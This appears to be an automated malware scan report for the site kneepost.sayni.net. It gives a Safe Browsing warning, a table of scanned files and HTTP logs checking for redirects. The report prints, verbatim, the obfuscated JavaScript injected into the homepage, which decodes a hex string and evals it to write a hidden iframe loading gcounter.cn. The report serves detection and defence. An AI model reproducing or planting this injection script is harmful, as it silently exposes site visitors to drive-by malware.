Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kneepost.sayni.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://kneepost.sayni.net/ | 200 OK Content-Length: 9710 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) A3938D4DB625884="parse";A3938D4DB625884+="I";A3938D4DB625884+="nt";EA05A5906="S";EA05A5906+="tri";EA05A5906+="ng.fromCharC";EA05A5906+="od";EA05A5906+="e";function BE49D6303A6A(D66BCADFB){var E7CA2E167327=116;E7CA2E167327=E7CA2E167327-100;F09A4AB4C=eval(A3938D4DB625884+"(D66BCADFB,E7CA2E167327)");return(F09A4AB4C);}function C880DAE825582(C89404FADEA524){var FE4E78A=172;FE4E78A=FE4E78A-170;var D9B44141996DB65="";for(AF541C67=0;AF541C67<C89404FADEA524.length;AF541C67+=FE4E78A){D9B44141996DB65+=( eval(EA05A5906+"(BE49D6303A6A(C89404FADEA524.substr(AF541C67,FE4E78A)))"));}eval(D9B44141996DB65);}C880DAE825582("6D78733D646F63756D656E742E676574456C656D656E744279496428276F63617027293B6966286D78733D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D6F636170207372633D687474703A2F2F67636F756E7465722E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D"); Antivirus reports:
| ||
http://kneepost.sayni.net/KneePost.sit | 200 OK Content-Length: 77492 Content-Type: application/x-stuffit | clean |
http://kneepost.sayni.net/test404page.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://kneepost.sayni.net/cgi-sys/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kneepost.sayni.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Dec 2014 21:58:33 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 9710
Content-Type: text/html
Last-Modified: Wed, 06 Jan 2010 01:23:40 GMT
...9710 bytes of data.
GET / HTTP/1.1
Host: kneepost.sayni.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Dec 2014 21:58:33 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 9710
Content-Type: text/html
Last-Modified: Wed, 06 Jan 2010 01:23:40 GMT
...9710 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kneepost.sayni.net
Referer: http://www.google.com/search?q=kneepost.sayni.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kneepost.sayni.net
Referer: http://www.google.com/search?q=kneepost.sayni.net
Result:
The result is similar to the first query. There are no suspicious redirects found.